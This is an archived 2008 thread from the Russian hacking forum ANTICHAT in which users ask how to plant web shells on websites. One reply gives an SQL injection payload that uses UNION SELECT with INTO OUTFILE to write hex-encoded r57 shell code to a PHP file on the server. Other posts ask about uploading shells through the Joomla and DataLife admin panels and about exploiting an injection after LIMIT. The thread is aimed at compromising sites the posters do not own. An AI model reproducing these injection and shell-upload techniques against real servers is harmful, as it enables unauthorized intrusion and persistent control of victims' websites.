ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

18.05.2008, 19:25
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме: 1215706
Репутация:
310
|
|
как загрузить r57 через mysql inj
index.php?p=-1+union+select+1,password,3,4,5,6,7,8+from+users/*
это типа пароль узнать, а как шелл загрузить?
|
|
|

18.05.2008, 19:31
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*
так, если конечно инто_аутфаил разрешён...
|
|
|

18.05.2008, 19:33
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме: 1215706
Репутация:
310
|
|
Сообщение от Ch3ck
index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*
так, если конечно инто_аутфаил разрешён...
Забыл сказать сервер виндовый
|
|
|

18.05.2008, 19:35
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Какая разница...
https://forum.antichat.ru/threadnav34338-1-10.html
|
|
|

19.05.2008, 11:19
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме: 340286
Репутация:
83
|
|
Скажите как залить шелл через админку в Joomla(Версия 1.0.1.2)?!
за ранее спс 
|
|
|

19.05.2008, 11:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
XaCeRoC
_http://forum.antichat.ru/thread50600.html
|
|
|

20.05.2008, 19:13
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме: 72605
Репутация:
13
|
|
Подскажите плиз как залить шелл в админке Datalife версия 6.7
|
|
|

21.05.2008, 14:14
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме: 72605
Репутация:
13
|
|
Через че вообще пытаться залить? Через рисунки не получается.
Последний раз редактировалось ty13r; 21.05.2008 в 18:10..
|
|
|

21.05.2008, 18:30
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''46151'' LIMIT 1' at line 2
Правильно ли я понимаю, что здесь иньекция используется после LIMIT и сделать ничего нельзя?
|
|
|

22.05.2008, 18:59
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Задался вопросом научиться искать уязвимости в исходниках. Есть ли среди вас сансеи ))
Большая прозьба: не посылать учить языки программирования. На мой взгляд это не обязательно, достаточно уметь читать код(могу ошибаться  ) Может кто подскажет или даст на расмотрение несколько наверняка уязвимых скриптов с комментариями?или ссылки на статьи по теме. Ну или... вам виднее.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|